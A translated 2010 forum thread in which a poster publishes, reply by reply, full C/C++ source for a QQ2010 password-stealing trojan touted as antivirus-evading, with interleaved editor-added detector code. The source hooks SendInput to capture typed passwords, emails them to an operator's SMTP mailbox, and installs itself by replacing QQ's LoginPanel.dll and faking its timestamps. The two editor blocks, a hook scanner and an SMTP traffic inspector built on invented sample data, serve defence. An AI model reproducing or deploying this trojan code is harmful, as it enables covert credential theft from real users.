[Old post] [Original] Freshly written QQ2010 trojan source code, guaranteed AV-evading (explanation added)
Posted: 2010-11-1 17:45 12490


If enough people reply, I'll post the full source!

The code has now all been posted, please read on.

I didn't explain the code, so I'm not sure whether everyone understood it.
So let me now explain the principle. Tencent QQ installs two hooks, one WH_DEBUG and one WH_KEYBOARD_LL. When QQ's password box gets focus, the DEBUG hook starts sending garbage keystrokes with SendInput, and when QQ starts it also first calls SendInput to send a garbage keystroke, so we hook the SendInput function. When we actually press a key, QQ sends a wrong key message through the WH_KEYBOARD_LL low-level hook. Through analysis I found that on a Win7 system the real key is recorded at 0x12faa0. After hooking, check the caller: if(nRetAddress!=0x74F3&&nRetAddress!=0x7374) rules out calls that did not come from a real keypress. Of course the addresses in that line are for Win7, which is why some people said it doesn't work on XP; since I'm on Win7 and haven't set up an XP VM yet, I haven't added that check. We basically don't need to care about the pInputs that are passed in; then with if(pInputs->ki.dwFlags==0)
we check whether it is a key-down, and if so, we start recording.
DWORD nRetAddress=0;
        _asm
        {
                mov eax,0
                mov ax,[ebp+4]
                mov nRetAddress,eax
        }
if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
This is how we find out where SendInput is being called from.
char key=0;
                _asm
                {
                        mov ebx,0x12faa0
                        mov eax,0
                        mov al,[ebx]
                        mov key,al
                }
This gets the real key. Later, after I switch to an XP system, I'll post these few key locations so everyone can use this trojan on XP too.

Some people will ask why my file is named User32Hook.cpp when what is actually hooked is SendInput. The reason is that while analysing with OD I found a fixed address in User32.dll where, via [ebp+c], the real key-down information can also be obtained; hooking there also yields the correct key information, from which the trojan could be written, and it obtains the real key earlier than QQ's WH_KEYBOARD_LL hook, so even if QQ zeroes the real key stored at 0x12faa0 (the Win7 address) inside WH_KEYBOARD_LL, it is no use. Anyone interested can set a breakpoint on WH_KEYBOARD_LL and trace upward to see it. But hooking USER32.dll that way means this DLL alone is not enough: you have to modify QQ.EXE, and QQ.EXE verifies its own file, which can be bypassed by modifying the import table and replacing CreateFileW so that a different file is opened; then write DLL-loading code at the entry address, hook USER32.DLL immediately, restore the memory at QQ's OEP and jump back to QQ's OEP. That way the password is obtained before QQ gets it when it is typed, and SendInput no longer needs to be hooked. Later I found that when a real key is pressed, the WH_KEYBOARD_LL hook also calls SendInput (with a wrong key, but we can get the real key from 0x12faa0), so I rewrote the code this way, which looks simpler. I won't say more about the rest; those who are interested can analyse it themselves!

The code follows; I'll post all of it bit by bit.


The program is in the attachment.
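The post above patches the first five bytes of user32!SendInput with an E9 JMP rel32 (InitHookCallBack and HookOn). A defender can run the same arithmetic in reverse: read the prologue of each exported function in the live process, decode the rel32 operand, and flag any jump whose target lies outside the module that exports the function. The C program below is an example added by the editor and is not part of the original thread or the poster's code; the module range, export addresses and prologue bytes are constructed sample data, and classify_prologue, sample_verdict, sample_target and count_foreign_jumps are names chosen here.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed image range standing in for user32.dll; not a real load address. */
#define USER32_BASE 0x77D00000u
#define USER32_SIZE 0x00090000u

enum hook_verdict {
    HOOK_NONE = 0,          /* entry point does not start with a control transfer */
    HOOK_JMP_IN_MODULE = 1, /* E9 jump that stays inside the module (thunk, hot-patch stub) */
    HOOK_JMP_FOREIGN = 2    /* E9 jump that leaves the module: inline hook */
};

/*
 * Classify the first five bytes of an exported function.  The rel32 operand of
 * E9 is relative to the end of the instruction, so the target is func + 5 + rel32
 * (computed modulo 2^32, exactly as the CPU does it).
 */
enum hook_verdict classify_prologue(const uint8_t prologue[5], uint32_t func_va,
                                    uint32_t mod_base, uint32_t mod_size,
                                    uint32_t *target_out)
{
    if (prologue[0] != 0xE9)
        return HOOK_NONE;
    uint32_t rel32;
    memcpy(&rel32, prologue + 1, sizeof rel32);      /* little-endian operand */
    uint32_t target = func_va + 5u + rel32;
    if (target_out)
        *target_out = target;
    /* one unsigned compare checks both bounds of [mod_base, mod_base + mod_size) */
    return (target - mod_base < mod_size) ? HOOK_JMP_IN_MODULE : HOOK_JMP_FOREIGN;
}

struct export_sample {
    const char *name;
    uint32_t    va;
    uint8_t     prologue[5];
};

/* Constructed snapshots of what a scanner would read from the live process. */
static const struct export_sample SAMPLES[] = {
    /* E9 5B 2C 2B 98: 0x77D4E3C5 + 0x982B2C5B wraps to 0x10001020, outside user32 */
    { "SendInput",   0x77D4E3C0u, { 0xE9, 0x5B, 0x2C, 0x2B, 0x98 } },
    /* untouched hot-patchable prologue: mov edi,edi / push ebp / mov ebp,esp */
    { "GetCaretPos", 0x77D3B7A0u, { 0x8B, 0xFF, 0x55, 0x8B, 0xEC } },
    /* E9 FB 00 00 00: jumps 0x100 bytes forward, still inside user32 */
    { "MessageBoxA", 0x77D2A000u, { 0xE9, 0xFB, 0x00, 0x00, 0x00 } },
};
#define SAMPLE_COUNT (sizeof SAMPLES / sizeof SAMPLES[0])

enum hook_verdict sample_verdict(size_t i, uint32_t *target_out)
{
    return classify_prologue(SAMPLES[i].prologue, SAMPLES[i].va,
                             USER32_BASE, USER32_SIZE, target_out);
}

uint32_t sample_target(size_t i)
{
    uint32_t t = 0;
    sample_verdict(i, &t);
    return t;
}

size_t count_foreign_jumps(void)
{
    size_t n = 0;
    for (size_t i = 0; i < SAMPLE_COUNT; i++)
        if (sample_verdict(i, NULL) == HOOK_JMP_FOREIGN)
            n++;
    return n;
}

int main(void)
{
    static const char *const label[] = { "clean", "jmp inside module", "INLINE HOOK" };
    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        uint32_t target = 0;
        enum hook_verdict v = sample_verdict(i, &target);
        printf("%-12s @%08" PRIX32 " : %s", SAMPLES[i].name, SAMPLES[i].va, label[v]);
        if (v != HOOK_NONE)
            printf(" -> %08" PRIX32, target);
        printf("\n");
    }
    printf("%zu hooked export(s)\n", count_foreign_jumps());
    return 0;
}
```

On a real system the prologue bytes come from ReadProcessMemory and the module range from the loaded-module list. A complementary check compares the in-memory prologue with the same bytes in the DLL on disk, which also catches patches that do not begin with E9; the jump-target test above is the cheap first pass, and the HookOff/HookOn dance in the posted code means the patch is absent for the brief window while the original SendInput runs, so a scanner should sample more than once.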

Latest replies (146)
2
Post the source so we can take a look.
2010-11-1 18:25
0
3
Bump...
2010-11-1 18:26
0
4
Saw the red-headline text... replying first without a second thought... open source is a good thing... bump!!!!!!!
2010-11-1 18:27
0
5
Thanks to OP for sharing; learning from OP.
2010-11-1 19:03
0
6
This is really impressive.
2010-11-1 19:30
0
7
............don't understand it, but bump!
2010-11-1 19:34
0
8
This is really impressive....
2010-11-1 19:35
0
9
Support original work... bump
2010-11-1 20:08
0
10
This deserves a bump!
2010-11-1 20:18
0
11
Let's see what the code quality is like~
2010-11-1 20:27
0
12

For those who replied, I'll slowly post all of the code.

Code of the trojan DLL's main.cpp file
#include <Windows.h>
#include <stdio.h>
#include "User32Hook.h"
#include "SendMail.h"
 
#pragma comment(linker,"/export:DllCanUnloadNow=Command.DllCanUnloadNow")
#pragma comment(linker,"/export:DllGetClassObject=Command.DllGetClassObject")
#pragma comment(linker,"/export:DllMain=Command.DllMain")
#pragma comment(linker,"/export:DllRegisterServer=Command.DllRegisterServer")
#pragma comment(linker,"/export:DllUnregisterServer=Command.DllUnregisterServer")
 
HWND hLoginWindow,hUserName,hUserPwd;
char g_UserName[100]={0};
char g_Version[100]={0};
 
void WaitLoginWindow()
{
    Sleep(1500);
    while(true)
    {
        hLoginWindow=GetForegroundWindow();
        POINT pni;
        RECT rcWindow;
 
        GetWindowRect(hLoginWindow,&rcWindow);
 
        pni.y=rcWindow.top+115;
        pni.x=rcWindow.left+100;
        hUserName=WindowFromPoint(pni);
 
        pni.y=rcWindow.top+155;
        pni.x=rcWindow.left+100;
        hUserPwd=WindowFromPoint(pni);
 
        LONG lStyle = ::GetWindowLong(hUserPwd, GWL_STYLE);
        if(lStyle & ES_PASSWORD)
            break;
 
        Sleep(100);
    }
}
 
DWORD WINAPI ServerThreadProc(LPVOID lpParameter)
{
    memset(g_Password,0,100);
    WaitLoginWindow();
    SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)g_UserName);
    SendMessage(hLoginWindow,WM_GETTEXT,100,(LPARAM)g_Version);
 
    while(true)
    {
        char tempAccounts[100];
        ::SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)tempAccounts);
        if(strcmp(g_UserName,tempAccounts)!=0&&strlen(tempAccounts)!=0)
            strcpy(g_UserName,tempAccounts);
 
        LONG lStyle = ::GetWindowLong(hUserPwd, GWL_STYLE);
        if((lStyle & ES_PASSWORD)==0)
            break;
        Sleep(100);
    }
 
    char szContext[64]={0};
    sprintf(szContext,"QQ版本:%s\r\n用户名:%s\r\n密  码:%s\r\n",g_Version,g_UserName,g_Password);
 
    SMTPINFO smtpinfo;
    strcpy(smtpinfo.SmtpSrvName,"AAAAAAAAAAAAAAAAAAAA");
    strcpy(smtpinfo.Port,"25");
    strcpy(smtpinfo.UserName,"BBBBBBBBBBBBBBBBBBBB");
    strcpy(smtpinfo.Password,"CCCCCCCCCCCCCCCCCCCC");
    strcpy(smtpinfo.From,"DDDDDDDDDDDDDDDDDDDD");
    strcpy(smtpinfo.To,"EEEEEEEEEEEEEEEEEEEE");
    strcpy(smtpinfo.Subject,"*☆‰小五※*提醒-获取到新的QQ!");
    strcpy(smtpinfo.Msg,szContext);
 
    SendMail(&smtpinfo);
 
    return 0;
}
 
BOOL WINAPI DllMain(__in void * _HDllHandle, __in unsigned _Reason, __in_opt void * _Reserved)
{
    switch(_Reason)
    {
        case DLL_PROCESS_ATTACH:
            InitHookCallBack();
            HookOn();
            CreateThread(NULL,0,ServerThreadProc,0,0,0);
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    return 0;
}
2010-11-1 20:35
0
13
Code of the User32Hook.h file

void HookOff();
void HookOn();
void InitHookCallBack();
 
extern char g_Password[100];
2010-11-1 20:43
0
14
SendMail.h file

typedef struct _SMTPINFO
{
    char SmtpSrvName[32];
    char Port[7];
    char UserName[16];
    char Password[16];
    char From[32];
    char To[32];
    char Subject[32];
    char Msg[64];
}SMTPINFO;
 
//Convert the username and password to base64
void Base64(unsigned char *chasc,unsigned char *chuue);
int Talk(SOCKET sockid, const char *OkCode, char *pSend);
int SendMail(const SMTPINFO *psmtpinfo);
2010-11-1 20:44
0
15
Code in the SendMail.cpp file
#include <winsock2.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "SendMail.h"
 
#pragma comment(lib,"ws2_32.lib")
 
const int buflen = 256;
char buf[buflen];
int i,userlen,passlen;
 
 
//---------------------------------------------------------------------
int SendMail(const SMTPINFO *psmtpinfo)
{
    //Prepare the network connection
    WSADATA wsadata;
 
    if (WSAStartup(MAKEWORD(2,2),&wsadata) != 0)
    {
        return 1;
    }
 
    //Create the socket
    SOCKET sockid;
 
    if ((sockid = socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }
 
    //Resolve the SMTP server's IP
    struct hostent *phostent = gethostbyname(psmtpinfo->SmtpSrvName);
    struct sockaddr_in addr;
 
    CopyMemory(&addr.sin_addr.S_un.S_addr,
    phostent->h_addr_list[0],
    sizeof(addr.sin_addr.S_un.S_addr));
 
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atoi(psmtpinfo->Port));
    ZeroMemory(&addr.sin_zero, 8);
 
    //Connect to the server
    if (connect(sockid, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == SOCKET_ERROR)
    {
        goto STOP;
    }
 
    if (Talk(sockid, "220", "EHLO sjdf"))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "250", "AUTH LOGIN"))
    {
        goto STOP;
    }
 
 
    ZeroMemory(buf, buflen);
 
    userlen = lstrlen(psmtpinfo->UserName);
    passlen = lstrlen(psmtpinfo->Password);
 
    for(i = 0; i < (userlen%3?userlen/3+1:userlen/3); i++)
    {
        Base64((unsigned char * )(psmtpinfo->UserName + i * 3),(unsigned char * )( buf + i * 4));
    }
 
    if (Talk(sockid, "334", buf))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
 
    for(i = 0; i < (passlen%3?passlen/3+1:passlen/3); i++)
    {
        Base64((unsigned char *)(psmtpinfo->Password + i * 3),(unsigned char * ) (buf + i * 4));
    }
 
    if (Talk(sockid, "334", buf))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
    wsprintf(buf, "MAIL FROM:<%s>", psmtpinfo->From);
 
    if (Talk(sockid, "235", buf))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
    wsprintf(buf, "RCPT TO:<%s>", psmtpinfo->To);
 
    if (Talk(sockid, "250", buf))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "250", "DATA"))
    {
        goto STOP;
    }
 
    ZeroMemory(buf, buflen);
    wsprintf(buf, "TO: %s\r\nFROM: %s\r\nSUBJECT: %s\r\n\r\n%s\r\n.",
        psmtpinfo->To,psmtpinfo->From,psmtpinfo->Subject,psmtpinfo->Msg);
    if (Talk(sockid, "354", buf))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "250", "QUIT"))
    {
        goto STOP;
    }
 
    if (Talk(sockid, "221", ""))
    {
        goto STOP;
    }
    else
    {
        closesocket(sockid);
        WSACleanup();
        return 0;
    }
 
STOP:
    closesocket(sockid);
    WSACleanup();
    return 1;
}
//---------------------------------------------------------------------
int Talk(SOCKET sockid, const char *OkCode, char *pSend)
{
    const int buflen = 256;
    char buf[buflen];
    ZeroMemory(buf, buflen);
 
    //Receive the server's reply
    if (recv(sockid, buf, buflen, 0) == SOCKET_ERROR)
    {
        return 1;
    }
    if (strstr(buf, OkCode) == NULL)
    {
        return 1;
    }
 
    //Send the command
    if (lstrlen(pSend))
    {
        ZeroMemory(buf, buflen);
        wsprintf(buf, "%s\r\n", pSend);
 
        typedef int (*MySend)(SOCKET,const char*,int,int);
         
        HMODULE hModule=LoadLibrary("Ws2_32.dll");
        MySend mySend=(MySend)GetProcAddress(hModule,"send");
 
        WSABUF DataBuf;
        DataBuf.len=lstrlen(buf);
        DataBuf.buf=buf;
 
        DWORD dwS;
        if(WSASend(sockid,&DataBuf,1,&dwS,0,0,0))
        //if (mySend(sockid, buf, lstrlen(buf), 0) == SOCKET_ERROR)
        {
            return 1;
        }
    }
 
    return 0;
}
//---------------------------------------------------------------------
//Base64 encoding; chasc: un-encoded binary input, chuue: encoded Base64 output
//Convert the username and password to base64
void Base64(unsigned char *chasc,unsigned char *chuue)
{
    int i,k=2;
    unsigned char t = 0;
 
    for(i=0;i<3;i++)
    {
 
        *(chuue+i)=*(chasc+i)>>k;
        *(chuue+i)|=t;
        t=*(chasc+i)<<(8-k);
        t>>=2;
        k+=2;
    }
 
    *(chuue+3)=*(chasc+2)&63;
 
    for(i=0;i<4;i++)
 
        if((*(chuue+i)>=0)&&(*(chuue+i)<=25)) *(chuue+i)+=65;
 
        else if((*(chuue+i)>=26)&&(*(chuue+i)<=51)) *(chuue+i)+=71;
 
        else if((*(chuue+i)>=52)&&(*(chuue+i)<=61)) *(chuue+i)-=4;
 
        else if(*(chuue+i)==62) *(chuue+i)=43;
 
        else if(*(chuue+i)==63) *(chuue+i)=47;
}
2010-11-1 20:44
0
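SendMail.cpp above drives a plain-text SMTP session on port 25: EHLO, AUTH LOGIN with base64 username and password, MAIL FROM, RCPT TO, DATA, a single message and QUIT. That command sequence is exactly what a network sensor sees, so a small inspector over the captured lines can recover the collection mailbox and flag the cleartext authentication. The C program below is an example added by the editor, not code from the thread; the transcript is constructed to mirror the command order in SendMail.cpp (the server name, addresses, username and password are invented), and inspect_smtp, b64_decode, has_prefix, inspect_sample and last_finding are names chosen here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct smtp_finding {
    int  cleartext_auth;    /* AUTH LOGIN completed on a session that never sent STARTTLS */
    int  message_submitted; /* DATA accepted with 354 and terminated by "." */
    char username[64];      /* decoded from the AUTH LOGIN exchange; the password is not kept */
    char mail_from[96], rcpt_to[96], subject[96];
};

static int b64_val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Decode base64 into a NUL-terminated buffer; returns the decoded length or -1 on bad input. */
int b64_decode(const char *in, char *out, size_t cap)
{
    size_t n = 0; unsigned acc = 0; int bits = 0, v;
    for (; *in && *in != '='; in++) {
        if ((v = b64_val((unsigned char)*in)) < 0 || n + 1 >= cap) return -1;
        acc = (acc << 6) | (unsigned)v;
        if ((bits += 6) >= 8) out[n++] = (char)((acc >> (bits -= 8)) & 0xFF);
    }
    out[n] = '\0';
    return (int)n;
}

static int has_prefix(const char *s, const char *p)   /* case-insensitive prefix test */
{
    for (; *p; s++, p++)
        if (toupper((unsigned char)*s) != toupper((unsigned char)*p)) return 0;
    return 1;
}

/* Copy a command argument or header value, skipping leading blanks. */
#define FIELD(dst, src) snprintf(dst, sizeof dst, "%s", (src) + strspn((src), " "))

/* Walk a transcript of "C: ..." / "S: ..." lines; returns the number of indicators raised (0..2). */
int inspect_smtp(const char *const *lines, size_t n, struct smtp_finding *f)
{
    enum { IDLE, WANT_USER, WANT_PASS, WANT_354, IN_DATA } state = IDLE;
    int starttls = 0;
    memset(f, 0, sizeof *f);
    for (size_t i = 0; i < n; i++) {
        const char *l = lines[i];
        if (has_prefix(l, "S: ")) {        /* server side: only the go-ahead for DATA matters here */
            if (state == WANT_354) state = has_prefix(l + 3, "354") ? IN_DATA : IDLE;
            continue;
        }
        if (!has_prefix(l, "C: ")) continue;
        l += 3;
        if (state == WANT_USER)
            state = b64_decode(l, f->username, sizeof f->username) >= 0 ? WANT_PASS : IDLE;
        else if (state == WANT_PASS) { f->cleartext_auth = !starttls; state = IDLE; } /* password: not stored */
        else if (state == IN_DATA) {
            if (strcmp(l, ".") == 0) { f->message_submitted = 1; state = IDLE; }
            else if (has_prefix(l, "SUBJECT:")) FIELD(f->subject, l + 8);
        }
        else if (has_prefix(l, "STARTTLS")) starttls = 1;
        else if (has_prefix(l, "AUTH LOGIN")) state = WANT_USER;
        else if (has_prefix(l, "MAIL FROM:")) FIELD(f->mail_from, l + 10);
        else if (has_prefix(l, "RCPT TO:")) FIELD(f->rcpt_to, l + 8);
        else if (has_prefix(l, "DATA")) state = WANT_354;
    }
    return f->cleartext_auth + f->message_submitted;
}

/* Constructed transcript mirroring the command order in SendMail.cpp; not a real capture. */
static const char *const SAMPLE_SESSION[] = {
    "C: EHLO sjdf",
    "C: AUTH LOGIN",
    "S: 334 VXNlcm5hbWU6",
    "C: Y29sbGVjdG9y",                    /* base64("collector") */
    "S: 334 UGFzc3dvcmQ6",
    "C: aHVudGVyMg==",                    /* base64 of a made-up password */
    "S: 235 Authentication successful",
    "C: MAIL FROM:<collector@example.test>",
    "C: RCPT TO:<inbox@example.test>",
    "C: DATA",
    "S: 354 End data with <CR><LF>.<CR><LF>",
    "C: SUBJECT: reminder - new QQ captured",
    "C: ",
    "C: .",
};

struct smtp_finding last_finding;         /* filled in by inspect_sample() */

int inspect_sample(void) { return inspect_smtp(SAMPLE_SESSION, sizeof SAMPLE_SESSION / sizeof *SAMPLE_SESSION, &last_finding); }

int main(void)
{
    printf("indicators=%d cleartext_auth=%d user=%s to=%s subject=\"%s\"\n", inspect_sample(),
           last_finding.cleartext_auth, last_finding.username, last_finding.rcpt_to, last_finding.subject);
    return 0;
}
```

Real traffic additionally needs CRLF splitting and dot-unstuffing of the DATA body, and a sensor would key the finding on the originating process or host. The useful observations are that AUTH LOGIN on port 25 exposes the collection mailbox's credentials to anything on the path, and that the MAIL FROM/RCPT TO pair together with a fixed subject string are the natural pivot for an egress rule or an alert.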
16

Code of the User32Hook.cpp file; this is where the QQ password is obtained.

#include <windows.h>
#include <stdio.h>
#include <WinAble.h>
 
#pragma comment(lib,"User32.lib")
#include "User32Hook.h"
 
char g_Password[100]={0};
int g_KeyIndex=0;
BYTE g_OldFunc[8];
BYTE g_NewFunc[8];
FARPROC g_lpHookFunc;
 
BYTE g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
DWORD g_lpHookFunc2;
 
 
char asciiKey1[]={
    '~','1','2','3','4','5','6','7','8','9','0','-','=',
    'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
    '[',']','\\',';','\'',',','.','/',
    '0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
char asciiKey2[]={
    '~','1','2','3','4','5','6','7','8','9','0','-','=',
    'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
    '[',']','\\',';','\'',',','.','/',
    '0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
unsigned int asciiTbl[]={
    0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
    0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
    0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
    0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
};
 
 
UINT WINAPI XwSendInput(UINT nInputs,LPINPUT pInputs,int cbSize)
{
    DWORD nRetAddress=0;
    _asm
    {
        mov eax,0
        mov ax,[ebp+4]
        mov nRetAddress,eax
    }
    UINT nRet=0;
    HookOff();
    nRet=SendInput(nInputs,pInputs,cbSize);
    HookOn();
 
    if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
    {
        char key=0;
        _asm
        {
            mov ebx,0x12faa0
            mov eax,0
            mov al,[ebx]
            mov key,al
        }
        POINT point;
        ::GetCaretPos(&point);
        int postion=point.x/8;
     
        if(pInputs->ki.dwFlags==0)
        {
            for(int i=0;i<63;i++)
            {
                if(GetKeyState(VK_NUMLOCK)==0&&i>(63-15))
                    break;
                if(asciiTbl[i]==key)
                {
                    if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)!=0)||GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)==0)
                    {
                        if(postion<g_KeyIndex)
                        {
                            for(int k=g_KeyIndex;k>=postion;k--)
                            {
                                g_Password[k+1]=g_Password[k];
                            }
                            g_Password[postion]=asciiKey1[i];
                            g_KeyIndex++;
                        }
                        else
                            g_Password[g_KeyIndex++]=asciiKey1[i];
                    }
                    if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)!=0))
                    {
                        if(postion<g_KeyIndex)
                        {
                            for(int k=g_KeyIndex;k>=postion;k--)
                            {
                                g_Password[k+1]=g_Password[k];
                            }
                            g_Password[postion]=asciiKey2[i];
                            g_KeyIndex++;
                        }
                        else
                            g_Password[g_KeyIndex++]=asciiKey2[i];
                    }
                }
            }
            if(key==0x8)
            {
                if(g_KeyIndex>0)
                {
                    g_Password[g_KeyIndex]=0;
                    g_Password[--g_KeyIndex]=0;
                }
            }
        }
    }
    return nRet;
}
 
void InitHookCallBack()
{
    g_lpHookFunc=GetProcAddress(GetModuleHandle("user32.dll"),"SendInput");
    g_NewFunc[0]=0xe9;
 
    memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
    DWORD *pNewFuncAddress=(DWORD*)&g_NewFunc[1];
 
    *pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
}
 
void HookOn()
{
    DWORD dwOleFlag;
    WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&dwOleFlag);
}
 
void HookOff()
{
    DWORD dwNewFlag;
    WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&dwNewFlag);
}
2010-11-1 20:46
0
17
Code used to install the DLL file

#include <windows.h>
#include <stdio.h>
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lib")
#include <Tlhelp32.h>
#include <WinAble.h>
 
#include "resource.h"
 
char g_data1[100]="aaaaaaaaaaaaaaaaaaaa";
char g_data2[100]="bbbbbbbbbbbbbbbbbbbb";
char g_data3[100]="cccccccccccccccccccc";
char g_data4[100]="dddddddddddddddddddd";
char g_data5[100]="eeeeeeeeeeeeeeeeeeee";
 
CHAR szPath[1024]={0};
DWORD dwIsQQ=0;
 
int GetQQPath(LPSTR lpPath)
{
    if(PathIsDirectory("C:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"C:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    else if(PathIsDirectory("D:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"D:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    else if(PathIsDirectory("E:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"E:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    else if(PathIsDirectory("F:\\Program Files\\Tencent\\QQ\\Bin"))
    {
        strcpy(szPath,"F:\\Program Files\\Tencent\\QQ\\Bin\\");
        dwIsQQ=1;
        return true;
    }
    WIN32_FIND_DATA FindFileData;
    HANDLE hFind;
    CHAR szDir[512];
    strcpy(szDir,lpPath);
    if(szDir[strlen(szDir)-1]!='\\')
        strcat(szDir,"\\");
    strcat(szDir,"*.*");
    hFind = ::FindFirstFile(szDir, &FindFileData);
    if(hFind==INVALID_HANDLE_VALUE)
        return 0;
    do
    {
        if(FindFileData.dwFileAttributes>=16&&FindFileData.dwFileAttributes<=22)
        {
            if(FindFileData.cFileName[0]!='.'&&stricmp("Windows",FindFileData.cFileName)!=0)
            {
                strcpy(szDir,lpPath);
                if(szDir[strlen(szDir)-1]!='\\')
                    strcat(szDir,"\\");
                strcat(szDir,FindFileData.cFileName);
                GetQQPath(szDir);
            }
        }
        else if(stricmp("QQ.exe",FindFileData.cFileName)==0)
        {
 
            if(lpPath[strlen(lpPath)-1]!='\\')
                strcat(lpPath,"\\");
            strcpy(szPath,lpPath);
            dwIsQQ=1;
            return 1;
        }
    } while (::FindNextFileA(hFind,&FindFileData));
    return 0;
}
 
void WriteData(HANDLE hFile)
{
    LONG dwAddress=0;
    DWORD dwWrite;
 
    dwAddress=0x177C;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data1,20,&dwWrite,NULL);
 
    dwAddress=0x1798;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data2,20,&dwWrite,NULL);
 
    dwAddress=0x17B0;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data3,20,&dwWrite,NULL);
 
    dwAddress=0x17C8;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data4,20,&dwWrite,NULL);
 
    dwAddress=0x17E0;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,g_data5,20,&dwWrite,NULL);
 
    char szDllPath2[1000];
    strcpy(szDllPath2,szPath);
    strcat(szDllPath2,"LoginPanel.dll");
 
    HANDLE hFileTime=CreateFile(szDllPath2,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
 
    FILETIME time;
    GetFileTime(hFileTime,NULL,NULL,&time);
    SetFileTime(hFile,&time,&time,&time);
 
    CloseHandle(hFile);
    CloseHandle(hFileTime);
}
 
 
bool InsertQQDirectory()
{
    HRSRC hRsrc=::FindResource(NULL,MAKEINTRESOURCE(IDR_DLL2),"DLL");
    HGLOBAL hGlobal=::LoadResource(NULL,hRsrc);
    LPVOID lpVoid=::LockResource(hGlobal);
    DWORD dwSize=::SizeofResource(NULL,hRsrc);
    CHAR szDriver[512]={0};
    for(int i=0;i<26;i++)
    {
        szDriver[0]='B'+i;
        szDriver[1]=':';
        szDriver[2]='\\';
        dwIsQQ=0;
        DWORD dwType=::GetDriveType(szDriver);
        if(dwType==DRIVE_NO_ROOT_DIR)
            continue;
        GetQQPath(szDriver);
        if(dwIsQQ==1)
        {  
            char szDllPath[1000];
            char szOlePath[1000];
            char szNewPath[1000];
 
            strcpy(szOlePath,szPath);
            strcat(szOlePath,"LoginPanel.dll");
            strcpy(szNewPath,szPath);
            strcat(szNewPath,"command.dll");
         
            if(GetFileType(szNewPath)!=FILE_TYPE_UNKNOWN)
                return true;
             
            CopyFile(szOlePath,szNewPath,TRUE);
            CopyFile(szOlePath,szNewPath,TRUE);
 
            strcpy(szDllPath,szPath);
            strcat(szDllPath,"LoginPanel.dll");
 
            HANDLE hFile=::CreateFile(szDllPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,
                NULL,CREATE_ALWAYS,0,NULL);
            DWORD dwWriteByte;
            if(hFile!=NULL)
                ::WriteFile(hFile,lpVoid,dwSize,&dwWriteByte,NULL);
 
            WriteData(hFile);
